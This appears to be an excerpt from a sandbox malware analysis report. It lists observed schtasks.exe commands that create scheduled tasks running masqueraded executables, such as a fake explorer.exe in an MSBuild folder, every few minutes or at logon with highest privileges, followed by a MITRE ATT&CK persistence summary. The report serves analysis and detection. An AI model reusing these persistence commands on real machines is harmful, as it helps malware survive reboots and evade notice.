C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "crealc" /sc MINUTE /mo 6 /tr "'C:\Windows\L2Schemas\creal.exe'" /rl HIGHEST /f
- Creates scheduled task(s)
PID:812
-
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "explorere" /sc MINUTE /mo 12 /tr "'C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\explorer.exe'" /f
- Creates scheduled task(s)
PID:1844
-
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\explorer.exe'" /rl HIGHEST /f
- Creates scheduled task(s)
PID:1432
-
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "explorere" /sc MINUTE /mo 13 /tr "'C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\explorer.exe'" /rl HIGHEST /f
PID:2824
-
C:\Windows\system32\wbem\WmiApSrv.exe
C:\Windows\system32\wbem\WmiApSrv.exe
PID:1428
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
Registry Run Keys / Startup Folder (2)
Winlogon Helper DLL (1)
Scheduled Task/Job (1)
Downloads